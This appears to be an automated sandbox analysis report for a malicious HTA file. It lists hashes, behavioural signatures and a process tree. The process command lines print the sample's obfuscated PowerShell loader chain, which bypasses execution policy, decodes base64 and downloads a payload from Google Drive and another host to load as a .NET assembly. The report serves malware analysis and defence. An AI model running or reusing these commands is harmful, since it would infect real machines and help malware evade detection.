Analysis
max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 28-10-2024 10:52
Static task: static1
Behavioral task: behavioral1
Sample: greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta
Resource: win10v2004-20241007-en
General
Target: greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta
Size: 131KB
MD5: cbb8dddfef9d1d2893d4a4b51b4f0dab
SHA1: 595c2221b9613342ed4a82c235ea19fe9c0383f9
SHA256: e25677838f8394ed8b59c431e454e3bd0ec107421ef1a2502c5167bdd1340ddc
SHA512: 1daa9c96c9ba2e6e1939ab2b82e9a8f771f9ba0d4c4d088214864034aa9084483c1f42e5436f32043809a0346f0d59d84eb902946e6f1672175e22cac042d4a4
SSDEEP: 192:4vCFXMFgYPCgYmHUCYc6dEMoyzsDxgYtaXQ:0CF8qYPRYmHU1Jyh2saYtag
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
Blocklisted process makes network request 3 IoCs
flow | pid | Process
4 | 2088 | poWersHElL.eXe
6 | 2132 | powershell.exe
8 | 2132 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid | Process
3024 | powershell.exe
2132 | powershell.exe
Evasion via Device Credential Deployment 2 IoCs
pid | Process
2088 | poWersHElL.eXe
2492 | powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
6 | drive.google.com
5 | drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | poWersHElL.eXe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid | Process
2088 | poWersHElL.eXe
2492 | powershell.exe
2088 | poWersHElL.eXe
2088 | poWersHElL.eXe
3024 | powershell.exe
2132 | powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2088 | poWersHElL.eXe
Token: SeDebugPrivilege | 2492 | powershell.exe
Token: SeDebugPrivilege | 3024 | powershell.exe
Token: SeDebugPrivilege | 2132 | powershell.exe
Suspicious use of WriteProcessMemory 28 IoCs
description | pid | Process | procid_target
PID 1940 wrote to memory of 2088 | 1940 | mshta.exe | 30
PID 1940 wrote to memory of 2088 | 1940 | mshta.exe | 30
PID 1940 wrote to memory of 2088 | 1940 | mshta.exe | 30
PID 1940 wrote to memory of 2088 | 1940 | mshta.exe | 30
PID 2088 wrote to memory of 2492 | 2088 | poWersHElL.eXe | 32
PID 2088 wrote to memory of 2492 | 2088 | poWersHElL.eXe | 32
PID 2088 wrote to memory of 2492 | 2088 | poWersHElL.eXe | 32
PID 2088 wrote to memory of 2492 | 2088 | poWersHElL.eXe | 32
PID 2088 wrote to memory of 2804 | 2088 | poWersHElL.eXe | 33
PID 2088 wrote to memory of 2804 | 2088 | poWersHElL.eXe | 33
PID 2088 wrote to memory of 2804 | 2088 | poWersHElL.eXe | 33
PID 2088 wrote to memory of 2804 | 2088 | poWersHElL.eXe | 33
PID 2804 wrote to memory of 2692 | 2804 | csc.exe | 34
PID 2804 wrote to memory of 2692 | 2804 | csc.exe | 34
PID 2804 wrote to memory of 2692 | 2804 | csc.exe | 34
PID 2804 wrote to memory of 2692 | 2804 | csc.exe | 34
PID 2088 wrote to memory of 2648 | 2088 | poWersHElL.eXe | 37
PID 2088 wrote to memory of 2648 | 2088 | poWersHElL.eXe | 37
PID 2088 wrote to memory of 2648 | 2088 | poWersHElL.eXe | 37
PID 2088 wrote to memory of 2648 | 2088 | poWersHElL.eXe | 37
PID 2648 wrote to memory of 3024 | 2648 | WScript.exe | 38
PID 2648 wrote to memory of 3024 | 2648 | WScript.exe | 38
PID 2648 wrote to memory of 3024 | 2648 | WScript.exe | 38
PID 2648 wrote to memory of 3024 | 2648 | WScript.exe | 38
PID 3024 wrote to memory of 2132 | 3024 | powershell.exe | 40
PID 3024 wrote to memory of 2132 | 3024 | powershell.exe | 40
PID 3024 wrote to memory of 2132 | 3024 | powershell.exe | 40
PID 3024 wrote to memory of 2132 | 3024 | powershell.exe | 40
Processes
C:\Windows\SysWOW64\mshta.exe
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingsalwayshappeningwithgreatattitudewithgoodnews.hta"
Tree depth: 1
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID: 1940
C:\Windows\SysWOW64\wInDOwsPoWershelL\V1.0\poWersHElL.eXe
Command line: "C:\Windows\sYSTem32\wInDOwsPoWershelL\V1.0\poWersHElL.eXe" "poWeRsHelL -EX bypass -nOp -W 1 -c devICEcRedEnTiALDePLOYMEnt ; Iex($(Iex('[SysTeM.TeXT.eNcodinG]'+[cHar]0X3A+[CHar]58+'uTf8.getstRINg([SYStem.coNverT]'+[ChAr]58+[CHAr]0X3a+'FrOMbase64string('+[CHar]34+'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'+[Char]34+'))')))"
Tree depth: 2
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2088
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bypass -nOp -W 1 -c devICEcRedEnTiALDePLOYMEnt
Tree depth: 3
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2492
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aibb6f7s.cmdline"
Tree depth: 3
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2804
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAE7.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAE6.tmp"
Tree depth: 4
- System Location Discovery: System Language Discovery
PID: 2692
C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestpicturewithgreatnewswithgoodthing.vbS"
Tree depth: 3
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID: 2648
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Tree depth: 4
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3024
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('YKwi'+'mageUrl = IHmhttps://dri'+'ve.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur IHm;YKwwebClient'+' = New-Object System.Net.WebClient;YKwimageBytes = YKwwebCl'+'ient.DownloadData(YKwimageUrl);YKwim'+'ageText = [System.Text.Encoding]::UTF8.GetStr'+'ing(YKwimageBytes);YKwst'+'artF'+'lag = IHm<<BASE64_START>>IHm;YKwendFlag = IHm<<BASE64_END>>IHm;YKwstartIndex = YKwimageText.I'+'ndexOf(YKwsta'+'rtFlag);YKwendIndex = YKwimageText.IndexOf(YKwendFlag);YKwstartIndex -ge 0 -and YKwendIndex '+'-gt YKwstartIndex;YKwstartIndex += YKwstartFlag.Length;YKwbase64Lengt'+'h = YKwendIndex - YKwstartIndex;YKwbase64Command = YKwimageText.Substring(YKwstartIndex, YKwbase64Length);YKwbase64Rev'+'ersed = -join (YKwbase64Command'+'.ToCha'+'rArray() VHU For'+'Each-Obj'+'ect'+' '+'{ YK'+'w_ })[-1..-('+'YKwbase64Command.Length)];YKwcommandBytes = ['+'System.Convert]::FromBase64String(YKwbas'+'e64Reversed);YKwloadedAssembly = [System.Reflection.Ass'+'embly'+']::Load(YK'+'wc'+'ommandBytes);YKwvaiMethod = [dnlib.IO.Home'+'].GetMethod(IHmVAIIHm);YKwvaiMethod.Invo'+'ke(YKwnull, @(IHmtxt.PL'+'LPMS/113/551.871.64'+'.891//:ptthIHm, IHmdesativadoIHm, IH'+'mdesativadoIHm, IH'+'mdesativadoI'+'Hm, IHmaspnet_regbrowsersIHm, IHmdesativadoIHm, IHmdesativadoIH'+'m,IHm'+'desativadoIHm,IHmdesativadoI'+'Hm,IHmdesativadoIHm,IHmdesativadoIHm,IHmdesativadoIHm,IHm1IHm,IHmdesativadoIHm));')-CREpLaCe([chAr]89+[chAr]75+[chAr]119),[chAr]36 -REpLAce ([chAr]73+[chAr]72+[chAr]109),[chAr]39 -REpLAce ([chAr]86+[chAr]72+[chAr]85),[chAr]124) |& ( $shElLid[1]+$shELlID[13]+'X')"
Tree depth: 5
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2132
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize: 7KB